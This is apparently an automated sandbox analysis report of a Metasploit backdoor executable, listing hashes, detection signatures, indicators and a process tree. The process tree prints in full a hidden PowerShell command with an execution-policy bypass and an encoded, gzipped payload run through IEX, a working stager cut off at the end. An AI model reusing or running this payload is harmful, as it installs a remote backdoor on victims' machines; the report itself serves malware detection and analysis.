metasploit | 2e5178beb8836016572ddf6378eecdc96ba59675d6f04f0c87b065cf8371d8ab

General

Target

fc3b69d8e282dab5bda986365208644d_JaffaCakes118.exe
Size

356KB
MD5

fc3b69d8e282dab5bda986365208644d
SHA1

1595633949e3e002117cd8a62cad6691ccfc37fb
SHA256

2e5178beb8836016572ddf6378eecdc96ba59675d6f04f0c87b065cf8371d8ab
SHA512

0bf942a53676943b8579cf8228d045b488b4572146430111807456bc728eae1f81c4f4cbf55dd57c8985248eb529818db05afe1f459a314d2558c5ee95f80314
SSDEEP

6144:i4nEWzFfs5t38dX6p+E41U7kp4TcnFOHuln+Otc+EkzI8jSejCE8aKP3sGvLghcA:+j73yFW1AC0daH/COuyzNRg

Score

10^/10

metasploit backdoor trojan

Malware Config

Signatures

MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
trojan backdoor metasploit
Blocklisted process makes network request 5 IoCs

Processes:

powershell.exe

flow pid process

2 2544 powershell.exe
2 2544 powershell.exe
2 2544 powershell.exe
2 2544 powershell.exe
2 2544 powershell.exe
Suspicious behavior: EnumeratesProcesses 2 IoCs

Processes:

powershell.exepowershell.exe

pid process

2600 powershell.exe
2544 powershell.exe
Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

powershell.exepowershell.exe

description pid process

Token: SeDebugPrivilege 2600 powershell.exe
Token: SeDebugPrivilege 2544 powershell.exe

flow	pid	process
2	2544	powershell.exe
2	2544	powershell.exe
2	2544	powershell.exe
2	2544	powershell.exe
2	2544	powershell.exe

pid	process
2600	powershell.exe
2544	powershell.exe

description	pid	process
Token: SeDebugPrivilege	2600	powershell.exe
Token: SeDebugPrivilege	2544	powershell.exe

Suspicious use of WriteProcessMemory 12 IoCs

Processes:

fc3b69d8e282dab5bda986365208644d_JaffaCakes118.execmd.exepowershell.exe

description	pid	process	target process
PID 2188 wrote to memory of 1508	2188	fc3b69d8e282dab5bda986365208644d_JaffaCakes118.exe	cmd.exe
PID 2188 wrote to memory of 1508	2188	fc3b69d8e282dab5bda986365208644d_JaffaCakes118.exe	cmd.exe
PID 2188 wrote to memory of 1508	2188	fc3b69d8e282dab5bda986365208644d_JaffaCakes118.exe	cmd.exe
PID 2188 wrote to memory of 1508	2188	fc3b69d8e282dab5bda986365208644d_JaffaCakes118.exe	cmd.exe
PID 1508 wrote to memory of 2600	1508	cmd.exe	powershell.exe
PID 1508 wrote to memory of 2600	1508	cmd.exe	powershell.exe
PID 1508 wrote to memory of 2600	1508	cmd.exe	powershell.exe
PID 1508 wrote to memory of 2600	1508	cmd.exe	powershell.exe
PID 2600 wrote to memory of 2544	2600	powershell.exe	powershell.exe
PID 2600 wrote to memory of 2544	2600	powershell.exe	powershell.exe
PID 2600 wrote to memory of 2544	2600	powershell.exe	powershell.exe
PID 2600 wrote to memory of 2544	2600	powershell.exe	powershell.exe

C:\Users\Admin\AppData\Local\Temp\fc3b69d8e282dab5bda986365208644d_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\fc3b69d8e282dab5bda986365208644d_JaffaCakes118.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2188

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -nop -exec bypass -win Hidden -noni -enc aQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA0ACkAewAkAGIAPQAnAHAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQAnAH0AZQBsAHMAZQB7ACQAYgA9ACQAZQBuAHYAOgB3AGkAbgBkAGkAcgArACcAXABzAHkAcwB3AG8AdwA2ADQAXABXAGkAbgBkAG8AdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACcAfQA7ACQAcwA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAUwB0AGEAcgB0AEkAbgBmAG8AOwAkAHMALgBGAGkAbABlAE4AYQBtAGUAPQAkAGIAOwAkAHMALgBBAHIAZwB1AG0AZQBuAHQAcwA9ACcALQBuAG8AcAAgAC0AdwAgAGgAaQBkAGQAZQBuACAALQBjACAAJABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACcAJwBIADQAcwBJAEEATwAzAGUARABWAG8AQwBBADcAMQBXAGEAMgAvAGEAUwBoAEQAOQBuAEUAcgA5AEQAMQBhAEYAaABLADAAUwBiAEEAaAB0AEgAbABLAGwAdQA4AFkAOABuAEcAQQBDAE0AWgBoAFgAMABkAFgARwBYAHAAdQBGAHgAVQB2AHQATgBhAC8AZQAvAHYAYwA3ADUAdABHAFEAdABxAGwAeQArACsARgBhAGkAZABqADEAegBPAHkAZQBQAFgATgBtAHgAMwA0AFMAdQBvAEwAeQBVAEgASgBSAHMAegBmADAASABhAHMAagBmAFgAMwA3ADUAcQB5AEYASQB6AHkAWAA1AE0AeQAwAFUASgAwADcAWgBrADcASwBSAEcAdAByADAAVgBQAE8AegBzAEMAVwBXAGMAZQA4AEgAOQBoADYAbQA4AGQATAA2AFoATQBrAGoAOQBCAGkAWQBmAEEANQBwAHUASAA0ADUAcQBhAGMAUgBCAEUASgB4AFgANgBlAHIAeABHAEIANABwAGoATQBIAHgAawBsAHMAYQB4AEkALwAwAGkAOQBDAFkAbgBJACsAZgAzAGoAbABMAGgAQwArAGkAcABsAC8AcwA3AFgARwBIAC8ARQA3AE8AQwAyAEsAVwBOADMAUQBxAFIAegBGAEgAcQBwAHIAYwBGAGQAbgBLAEwATAAyAHcAdABHAGgAWgB6ADkALwBEAG0AcgBqAE0ANABMADQAMwB6AGwAUwA0AEoAWgBMAEcAZgB0AFQAUwB6AEkAUABPADgAeABsAGwAVwBrAGIAMABxADYAWQBXAGUAegBJAEgATABXAG8AbQA3AEUAWQArADYATABmAEkAKwBHAEYAOABWADgATgA0AHkAeABUADUAcQB3ADIAcABKAFkAUgBFAHkANABGADIAYwBWAE8AQQB6ADgAUgBVAFEAawBVAFMAaQBkAEgAaQB0AGQAWgArADgAbABaADIASABZAGkAcgBpAEwAUABDADgAaQBNAFEAVABsAHoAWABEAEoAWgAwAFQATwBoAEEAbABqAE8AZQBrAHYAZQBYAFEAQQA4AFoAQwBFAGcAcwA0AEoAMgBBAFcASgArAE0ASQBtADAAWgBLADYASgBNADcAWABjAGUAZwB4ADgAawBEADgAcwBkAHcAawBxACsAUABaAFgAeABzAGsAbgB3AGEAQgBWADAAdABFAFMAZwA0AHkAOAB6AEoAYQBpADMAcwBKAEkALwBzAEYAcwBzAHIAUABlAEEAOQBKAFYAZQBEADUAbgBsAGkAZwA0AHQAdgBiAE4AMgAvAGYAKwBFAGMANQBlAE0AUgBrAGkAMABIAFMAdQB5AGkAZQA2AGcARgBHAFoANgBQAGQAbQBBAEIAYwB1AGMAVgBqAHUAdgBQACsASgBHAGsANQB5AFkASQBkAHMAZQBEAFIAQgBxAGEAWgBUAHAAUQBRAFoAUwB5AE4AMABtAHkATQB4AG0ATQBwAE0AeQB0AGMAZABYAE0AdgB4AHgAZQBPAHoAdQBDADYAdgBGAHIAVgA3AHUARABkAHkATwBIAFUARwAwAFAATQBJAFYARwBaACsAUgBhADUANQBZAGUAUABTAGIAbABkAFgAcQBYADIAbAA0AFYAbgBFAEoAKwBHAHgATgBpAEUAZQBFADcAZABvADcAYgBrAFgALwBGAFAAZgBFAFoAMgBSADgANABmADMAWgBxAEEAVABzADQAZQBEAE0AUQB6AEMAQwBNAEIARgBpAG0AVgBPAFcAbgAwAGMAMQBoAGwAVABzAFgAMwBXAEQAMgBoAHoAQwBNAFIAYwBpAEcASABNAGEAQwBDADkAQwByAFAAdwBlAHkAegBJADIAZgBOADAAQwBKAHoASQBHAHMALwB6ADAASQBtAGYARgBBADAATwBYAG8AZgBWAEwAdwA1ADcAcAA3AE8AdwBTAGwAYgBaAGoAaQBPAGMAMQBJAHIAZwBaAEoAeQBjADUASgBOAE0AQwBOAGUAVABrAEoAaABUAEEAOABtAGwAQQBpACsARwAyAGEAZgA0AEYAbwBKAEUAOQBUAEYAcwBUAGcAdQBOADEAWgArADUAUABPAHcAYgA1AG0ASABzAFkAZwBTAEYALwBJAEkASABIAFQAcwBCAFgARQBwAFoAaQBrAGwATwBhAGwATwBQAGEASgB2AGIAQgBvAGMAOQA4AC8AKwBrAHAAQQB5AFoAbwB5AEcAQQBhAHkAMABoAEkAVABBAG0ANQBRAEkAVwA2AFQAcQBpAEEARABxAFQAZwBsAEsAMwBpAGIAQwBuAEMAOABZAG0AWQBQAFAAcgBzAGEAcgBEAEEAZABRADAAWQBlAEMAMgBNAGsASgBCADgAVABMAHYAbwBUADAAcQBQAGkAOQB2AEYATgB1AGoAcQBTAGMANABJAFMARQAyADQAeQBMAG4ATwBUAFEAUwBNAEMAVgBrAGYASwA4AGsAOQBlAGYANABUAGkANQBMAFoANABoAEsAawBmAGsAawBDAFAANQBXAEUAawBqAGYAUwBOAFMANQBXAGMAdwA2AGcAYgByAHYAagBzADAAbwBvADYAVwBpAHYAWgBBADIASQA2AGUAUwBBAEEAMQAxAFkAagBQAGQAUgB5AFQAagB5AFYAYgBSAEUAQwBjAC8ARQA2ADkAcAAyAFUARQB6ADgAQQBNAG0AZQBYAHEATQAxAHAAQQBLADEAbwB3AEwAZgBqAHYAMABnAHUAVABHADUAZgBlADMAZQAyADAAcgBrAGIARwBlAHUASQBqAE0AegBhAHQAZQBzAHQAbwAxACsAdQBsADUAYQAzAHQAbABJAFIAZABNAGMAVgBkAHkAeABSAFcAcABUACsAZAAyAHEAagArADAAQgAyAEkAbwBZAG4AcQBIAGEAcgBOAEIAcQBYAHQANABwAFoAdQA3AFEAYgB5AEIAbQB2ADEANAAxAGIAZgByAGoAUgA5AHYAWgAwAEcAbgBqADgAdwBmAEQAKwA0ADkATwAyAEgAdwBvAGMAcQBiAGYAVABLAGIAVgAwAHIANABvAFoAUgBTAFIAbwA5AGYAYQBWAHIAcABiAGgAQwBWAC8AVQAyADcAYgBaAG4AdAAxAFgAeABPAEgAQQBZADcAdgBwAHEAMABDADkAYwBZADcAcAB1AFIARgBPAG4AdwBLADIAdABpAFYAQgB0AGMAdQBGAHUAYgAzADIAbgBOAHIARwA4AHoAYQBDAHUAWAB2AGQASwBNADEAUgBCAHEAQgB4AFcAbgBLAHIATwA3AHcAWgA2AGgARgBxAHEAZwB3AE8ASABQAHgAcQBGADkANwBOAGEAQQBHAGQAdABYAGwAQQB5AGIASABlAHIAZQByAHQAZAAxAFYARwAzAE4AdgAxAGkAWABLAHMAQgB4AFAAYgB4AFIATwA4ADUAUgBUAHAAYwA5AEIAOABtAE0ASwA4AEMAaABEAHQAVgBLADUAawBlADIAZgBKAEIARwAwAGkAcQBjAFkAUwBEAEIALwBBAEoAeQBrAFYAMwA0AG8ATwBQADgAUgA3AHAANwA1AHMAOABMAHUASwBaAHoAcABFAE8AUAB0AFgAaABGADgAQQAxAFcARgBSAGIARABPAHkAZABiAHAARQBqAGgAegBYADcARwBEAFcARwBtADYAcQBxAEYAZwBhAHQARQBxAHAAcgB0AEYAYwBMAFUATABvAGsARAB2AFEAMgBSAHYASABTADIAQgBwAHEAdwBmAEcANAAxAC8AdgBRAEgAUABpAHEAMAAyAGUAWABxAGwASAB1AEwARgB4AGYAVgBkAFYAVgAzAGIAaAB6AGgANABYADEAMQBmADMAbABWAGEATgBIAG4AVABsAEgAWABWAFYAMQAzAHEAVQA2AEEAYQBGAGsAeQBBAGUAdABYAG0AeABhAEwAdQBlAHoAawA3AFMALwBkAE4AOQBiAE8ASQBvAG4AbQBJAEUAYwA0AEEAWQAvAFYAbQBtAFYAUgA5AFgARABoAGQAegBpAE4ASQAyAFEANQBhAGMAKwBQAFMATgBSAFMAQgBqADAATgB1AGgAKwBSADMAMABqAHgAcgBpAGIAOQBvAGUAVAArAHgAcwA2ADEATAA1AHYAagBLAEYAYwB1AHoAQwA4AEsAUAA1AHkAcABFAGoAZgBIAFoAVwBuAHQAbgBGADgAZABYAE0AegBCAE0AQgBRAE4AcQBkADYAegBqAGQASQBHAEkAaABKAFQAbAB0AGYAYQBCAHEAMABBAEcAMQBkADAAdQBEADgAcgB6ADkAcwBtAFMAOAAyADgAcgBNAGwAYwAyAGsAcgBPAFMAWAB2AHgAeQAzAFoAYgBrAHMAbAByAGIARwBNAEcANwBlAHIAUwAyADIAOQBRAE4AZgAvAEEAOABXAEgASQBwAC8AQQBqAC8AYwA2AGkAcAAvAGUALwBjAGIANgBLAHQAcQAxADMARABOAEsAZgByAEkAKwBmAC8ARwBmAFUAdgBCAG4AWgBQAFEAdwBGAGUAQgB1AHcAMwAzAEYAeQBMADYAbAAvAG8ANgBUAGcAOABKAE8AdgBrAGEAZQBVAGcAZgBxADgAUQA5AFAAKwBvAFYANABuADQAagB6AEoAbgB5AHEALwBBAHQAbgA2AGQANABZAG0AZwBvAEEAQQBBAD0APQAnACcAKQApADsASQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBHAHoAaQBwAFMAdAByAGUAYQBtACgAJABzACwAWwBJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ATQBvAGQAZQBdADoAOgBEAGUAYwBvAG0AcAByAGUAcwBzACkAKQApAC4AUgBlAGEAZABUAG8ARQBuAGQAKAApADsAJwA7ACQAcwAuAFUAcwBlAFMAaABlAGwAbABFAHgAZQBjAHUAdABlAD0AJABmAGEAbABzAGUAOwAkAHMALgBSAGUAZABpAHIAZQBjAHQAUwB0AGEAbgBkAGEAcgBkAE8AdQB0AHAAdQB0AD0AJAB0AHIAdQBlADsAJABzAC4AVwBpAG4AZABvAHcAUwB0AHkAbABlAD0AJwBIAGkAZABkAGUAbgAnADsAJABzAC4AQwByAGUAYQB0AGUATgBvAFcAaQBuAGQAbwB3AD0AJAB0AHIAdQBlADsAJABwAD0AWwBTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoAUwB0AGEAcgB0ACgAJABzACkAOwA=
2⤵
- Suspicious use of WriteProcessMemory
PID:1508

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nop -exec bypass -win Hidden -noni -enc aQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA0ACkAewAkAGIAPQAnAHAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQAnAH0AZQBsAHMAZQB7ACQAYgA9ACQAZQBuAHYAOgB3AGkAbgBkAGkAcgArACcAXABzAHkAcwB3AG8AdwA2ADQAXABXAGkAbgBkAG8AdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACcAfQA7ACQAcwA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAUwB0AGEAcgB0AEkAbgBmAG8AOwAkAHMALgBGAGkAbABlAE4AYQBtAGUAPQAkAGIAOwAkAHMALgBBAHIAZwB1AG0AZQBuAHQAcwA9ACcALQBuAG8AcAAgAC0AdwAgAGgAaQBkAGQAZQBuACAALQBjACAAJABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACcAJwBIADQAcwBJAEEATwAzAGUARABWAG8AQwBBADcAMQBXAGEAMgAvAGEAUwBoAEQAOQBuAEUAcgA5AEQAMQBhAEYAaABLADAAUwBiAEEAaAB0AEgAbABLAGwAdQA4AFkAOABuAEcAQQBDAE0AWgBoAFgAMABkAFgARwBYAHAAdQBGAHgAVQB2AHQATgBhAC8AZQAvAHYAYwA3ADUAdABHAFEAdABxAGwAeQArACsARgBhAGkAZABqADEAegBPAHkAZQBQAFgATgBtAHgAMwA0AFMAdQBvAEwAeQBVAEgASgBSAHMAegBmADAASABhAHMAagBmAFgAMwA3ADUAcQB5AEYASQB6AHkAWAA1AE0AeQAwAFUASgAwADcAWgBrADcASwBSAEcAdAByADAAVgBQAE8AegBzAEMAVwBXAGMAZQA4AEgAOQBoADYAbQA4AGQATAA2AFoATQBrAGoAOQBCAGkAWQBmAEEANQBwAHUASAA0ADUAcQBhAGMAUgBCAEUASgB4AFgANgBlAHIAeABHAEIANABwAGoATQBIAHgAawBsAHMAYQB4AEkALwAwAGkAOQBDAFkAbgBJACsAZgAzAGoAbABMAGgAQwArAGkAcABsAC8AcwA3AFgARwBIAC8ARQA3AE8AQwAyAEsAVwBOADMAUQBxAFIAegBGAEgAcQBwAHIAYwBGAGQAbgBLAEwATAAyAHcAdABHAGgAWgB6ADkALwBEAG0AcgBqAE0ANABMADQAMwB6AGwAUwA0AEoAWgBMAEcAZgB0AFQAUwB6AEkAUABPADgAeABsAGwAVwBrAGIAMABxADYAWQBXAGUAegBJAEgATABXAG8AbQA3AEUAWQArADYATABmAEkAKwBHAEYAOABWADgATgA0AHkAeABUADUAcQB3ADIAcABKAFkAUgBFAHkANABGADIAYwBWAE8AQQB6ADgAUgBVAFEAawBVAFMAaQBkAEgAaQB0AGQAWgArADgAbABaADIASABZAGkAcgBpAEwAUABDADgAaQBNAFEAVABsAHoAWABEAEoAWgAwAFQATwBoAEEAbABqAE8AZQBrAHYAZQBYAFEAQQA4AFoAQwBFAGcAcwA0AEoAMgBBAFcASgArAE0ASQBtADAAWgBLADYASgBNADcAWABjAGUAZwB4ADgAawBEADgAcwBkAHcAawBxACsAUABaAFgAeABzAGsAbgB3AGEAQgBWADAAdABFAFMAZwA0AHkAOAB6AEoAYQBpADMAcwBKAEkALwBzAEYAcwBzAHIAUABlAEEAOQBKAFYAZQBEADUAbgBsAGkAZwA0AHQAdgBiAE4AMgAvAGYAKwBFAGMANQBlAE0AUgBrAGkAMABIAFMAdQB5AGkAZQA2AGcARgBHAFoANgBQAGQAbQBBAEIAYwB1AGMAVgBqAHUAdgBQACsASgBHAGsANQB5AFkASQBkAHMAZQBEAFIAQgBxAGEAWgBUAHAAUQBRAFoAUwB5AE4AMABtAHkATQB4AG0ATQBwAE0AeQB0AGMAZABYAE0AdgB4AHgAZQBPAHoAdQBDADYAdgBGAHIAVgA3AHUARABkAHkATwBIAFUARwAwAFAATQBJAFYARwBaACsAUgBhADUANQBZAGUAUABTAGIAbABkAFgAcQBYADIAbAA0AFYAbgBFAEoAKwBHAHgATgBpAEUAZQBFADcAZABvADcAYgBrAFgALwBGAFAAZgBFAFoAMgBSADgANABmADMAWgBxAEEAVABzADQAZQBEAE0AUQB6AEMAQwBNAEIARgBpAG0AVgBPAFcAbgAwAGMAMQBoAGwAVABzAFgAMwBXAEQAMgBoAHoAQwBNAFIAYwBpAEcASABNAGEAQwBDADkAQwByAFAAdwBlAHkAegBJADIAZgBOADAAQwBKAHoASQBHAHMALwB6ADAASQBtAGYARgBBADAATwBYAG8AZgBWAEwAdwA1ADcAcAA3AE8AdwBTAGwAYgBaAGoAaQBPAGMAMQBJAHIAZwBaAEoAeQBjADUASgBOAE0AQwBOAGUAVABrAEoAaABUAEEAOABtAGwAQQBpACsARwAyAGEAZgA0AEYAbwBKAEUAOQBUAEYAcwBUAGcAdQBOADEAWgArADUAUABPAHcAYgA1AG0ASABzAFkAZwBTAEYALwBJAEkASABIAFQAcwBCAFgARQBwAFoAaQBrAGwATwBhAGwATwBQAGEASgB2AGIAQgBvAGMAOQA4AC8AKwBrAHAAQQB5AFoAbwB5AEcAQQBhAHkAMABoAEkAVABBAG0ANQBRAEkAVwA2AFQAcQBpAEEARABxAFQAZwBsAEsAMwBpAGIAQwBuAEMAOABZAG0AWQBQAFAAcgBzAGEAcgBEAEEAZABRADAAWQBlAEMAMgBNAGsASgBCADgAVABMAHYAbwBUADAAcQBQAGkAOQB2AEYATgB1AGoAcQBTAGMANABJAFMARQAyADQAeQBMAG4ATwBUAFEAUwBNAEMAVgBrAGYASwA4AGsAOQBlAGYANABUAGkANQBMAFoANABoAEsAawBmAGsAawBDAFAANQBXAEUAawBqAGYAUwBOAFMANQBXAGMAdwA2AGcAYgByAHYAagBzADAAbwBvADYAVwBpAHYAWgBBADIASQA2AGUAUwBBAEEAMQAxAFkAagBQAGQAUgB5AFQAagB5AFYAYgBSAEUAQwBjAC8ARQA2ADkAcAAyAFUARQB6ADgAQQBNAG0AZQBYAHEATQAxAHAAQQBLADEAbwB3AEwAZgBqAHYAMABnAHUAVABHADUAZgBlADMAZQAyADAAcgBrAGIARwBlAHUASQBqAE0AegBhAHQAZQBzAHQAbwAxACsAdQBsADUAYQAzAHQAbABJAFIAZABNAGMAVgBkAHkAeABSAFcAcABUACsAZAAyAHEAagArADAAQgAyAEkAbwBZAG4AcQBIAGEAcgBOAEIAcQBYAHQANABwAFoAdQA3AFEAYgB5AEIAbQB2ADEANAAxAGIAZgByAGoAUgA5AHYAWgAwAEcAbgBqADgAdwBmAEQAKwA0ADkATwAyAEgAdwBvAGMAcQBiAGYAVABLAGIAVgAwAHIANABvAFoAUgBTAFIAbwA5AGYAYQBWAHIAcABiAGgAQwBWAC8AVQAyADcAYgBaAG4AdAAxAFgAeABPAEgAQQBZADcAdgBwAHEAMABDADkAYwBZADcAcAB1AFIARgBPAG4AdwBLADIAdABpAFYAQgB0AGMAdQBGAHUAYgAzADIAbgBOAHIARwA4AHoAYQBDAHUAWAB2AGQASwBNADEAUgBCAHEAQgB4AFcAbgBLAHIATwA3AHcAWgA2AGgARgBxAHEAZwB3AE8ASABQAHgAcQBGADkANwBOAGEAQQBHAGQAdABYAGwAQQB5AGIASABlAHIAZQByAHQAZAAxAFYARwAzAE4AdgAxAGkAWABLAHMAQgB4AFAAYgB4AFIATwA4ADUAUgBUAHAAYwA5AEIAOABtAE0ASwA4AEMAaABEAHQAVgBLADUAawBlADIAZgBKAEIARwAwAGkAcQBjAFkAUwBEAEIALwBBAEoAeQBrAFYAMwA0AG8ATwBQADgAUgA3AHAANwA1AHMAOABMAHUASwBaAHoAcABFAE8AUAB0AFgAaABGADgAQQAxAFcARgBSAGIARABPAHkAZABiAHAARQBqAGgAegBYADcARwBEAFcARwBtADYAcQBxAEYAZwBhAHQARQBxAHAAcgB0AEYAYwBMAFUATABvAGsARAB2AFEAMgBSAHYASABTADIAQgBwAHEAdwBmAEcANAAxAC8AdgBRAEgAUABpAHEAMAAyAGUAWABxAGwASAB1AEwARgB4AGYAVgBkAFYAVgAzAGIAaAB6AGgANABYADEAMQBmADMAbABWAGEATgBIAG4AVABsAEgAWABWAFYAMQAzAHEAVQA2AEEAYQBGAGsAeQBBAGUAdABYAG0AeABhAEwAdQBlAHoAawA3AFMALwBkAE4AOQBiAE8ASQBvAG4AbQBJAEUAYwA0AEEAWQAvAFYAbQBtAFYAUgA5AFgARABoAGQAegBpAE4ASQAyAFEANQBhAGMAKwBQAFMATgBSAFMAQgBqADAATgB1AGgAKwBSADMAMABqAHgAcgBpAGIAOQBvAGUAVAArAHgAcwA2ADEATAA1AHYAagBLAEYAYwB1AHoAQwA4AEsAUAA1AHkAcABFAGoAZgBIAFoAVwBuAHQAbgBGADgAZABYAE0AegBCAE0AQgBRAE4AcQBkADYAegBqAGQASQBHAEkAaABKAFQAbAB0AGYAYQBCAHEAMABBAEcAMQBkADAAdQBEADgAcgB6ADkAcwBtAFMAOAAyADgAcgBNAGwAYwAyAGsAcgBPAFMAWAB2AHgAeQAzAFoAYgBrAHMAbAByAGIARwBNAEcANwBlAHIAUwAyADIAOQBRAE4AZgAvAEEAOABXAEgASQBwAC8AQQBqAC8AYwA2AGkAcAAvAGUALwBjAGIANgBLAHQAcQAxADMARABOAEsAZgByAEkAKwBmAC8ARwBmAFUAdgBCAG4AWgBQAFEAdwBGAGUAQgB1AHcAMwAzAEYAeQBMADYAbAAvAG8ANgBUAGcAOABKAE8AdgBrAGEAZQBVAGcAZgBxADgAUQA5AFAAKwBvAFYANABuADQAagB6AEoAbgB5AHEALwBBAHQAbgA2AGQANABZAG0AZwBvAEEAQQBBAD0APQAnACcAKQApADsASQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBHAHoAaQBwAFMAdAByAGUAYQBtACgAJABzACwAWwBJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ATQBvAGQAZQBdADoAOgBEAGUAYwBvAG0AcAByAGUAcwBzACkAKQApAC4AUgBlAGEAZABUAG8ARQBuAGQAKAApADsAJwA7ACQAcwAuAFUAcwBlAFMAaABlAGwAbABFAHgAZQBjAHUAdABlAD0AJABmAGEAbABzAGUAOwAkAHMALgBSAGUAZABpAHIAZQBjAHQAUwB0AGEAbgBkAGEAcgBkAE8AdQB0AHAAdQB0AD0AJAB0AHIAdQBlADsAJABzAC4AVwBpAG4AZABvAHcAUwB0AHkAbABlAD0AJwBIAGkAZABkAGUAbgAnADsAJABzAC4AQwByAGUAYQB0AGUATgBvAFcAaQBuAGQAbwB3AD0AJAB0AHIAdQBlADsAJABwAD0AWwBTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoAUwB0AGEAcgB0ACgAJABzACkAOwA=
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2600

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" -nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String('H4sIAO3eDVoCA71Wa2/aShD9nEr9D1aFhK0SbAhtHlKlu8Y8nGACMZhX0dXGXpuFxUvtNa/e/vc75tGQtqly++Faidj1zOyePXNmx34SuoLyUHJRszf0HasjfX375qyFIzyX5My0UJ07Zk7KRGtr0VPOzsCWWce8H9h6m8dL6ZMkj9BiYfA5puH45qacRBEJxX6erxGB4pjMHxklsaxI/0i9CYnI+f3jlLhC+ipl/s7XGH/E7OC2KWN3QqRzFHqprcFdnKLL2wtGhZz9/DmrjM4L43zlS4JZLGftTSzIPO8xllWkb0q6YWezIHLWom7EY+6LfI+GF8V8N4yxT5qw2pJYREy4F2cVOAz8RUQkUSidHitdZ+8lZ2HYiriLPC8iMQTlzXDJZ0TOhAljOekveXQA8ZCEgs4J2AWJ+MIm0ZK6JM7Xcegx8kD8sdwkq+PZXxsknwaBV0tESg4y8zJai3sJI/sFssrPeA9JVeD5nlig4tvbN2/f+Ec5eMRki0HSuyie6gFGZ6PdmABcucVjuvP+JGk5yYIdseDRBqaZTpQQZSyN0myMxmMpMytcdXMvxxeOzuC6vFrV7uDdyOHUG0PMIVGZ+Ra55YePSbldXqX2l4VnEJ+GxNiEeE7do7bkX/FPfEZ2R84f3ZqATs4eDMQzCCMBFimVOWn0c1hlTsX3WD2hzCMRciGHMaCC9CrPweyzI2fN0CJzIGs/z0ImfFA0OXofVLw57p7OwSlbZjiOc1IrgZJyc5JNMCNeTkJhTA8mlAi+G2af4FoJE9TFsTguN1Z+5POwb5mHsYgSF/IIHHTsBXEpZiklOalOPaJvbBoc98/+kpAyZoyGAay0hITAm5QIW6TqiADqTglK3ibCnC8YmYPPrsarDAdQ0YeC2MkJB8TLvoT0qPi9vFNujqSc4ISE24yLnOTQSMCVkfK8k9ef4Ti5LZ4hKkfkkCP5WEkjfSNS5Wcw6gbrvjs0oo6WivZA2I6eSAA11YjPdRyTjyVbRECc/E69p2UEz8AMmeXqM1pAK1owLfjv0guTG5fe3e20rkbGeuIjMzatesto1+ul5a3tlIRdMcVdyxRWpT+d2qj+0B2IoYnqHarNBqXt4pZu7QbyBmv141bfrjR9vZ0Gnj8wfD+49O2HwocqbfTKbV0r4oZRSRo9faVrpbhCV/U27bZnt1XxOHAY7vpq0C9cY7puRFOnwK2tiVBtcuFub32nNrG8zaCuXvdKM1RBqBxWnKrO7wZ6hFqqgwOHPxqF97NaAGdtXlAybHerertd1VG3Nv1iXKsBxPbxRO85RTpc9B8mMK8ChDtVK5ke2fJBG0iqcYSDB/AJykV34oOP8R7p75s8LuKZzpEOPtXhF8A1WFRbDOydbpEjhzX7GDWGm6qqFgatEqprtFcLULokDvQ2RvHS2BpqwfG41/vQHPiq02eXqlHuLFxfVdVV3bhzh4X11f3lVaNHnTlHXVV13qU6AaFkyAetXmxaLuezk7S/dN9bOIonmIEc4AY/VmmVR9XDhdziNI2Q5ac+PSNRSBj0Nuh+R30jxrib9oeT+xs61L5vjKFcuzC8KP5ypEjfHZWntnF8dXMzBMBQNqd6zjdI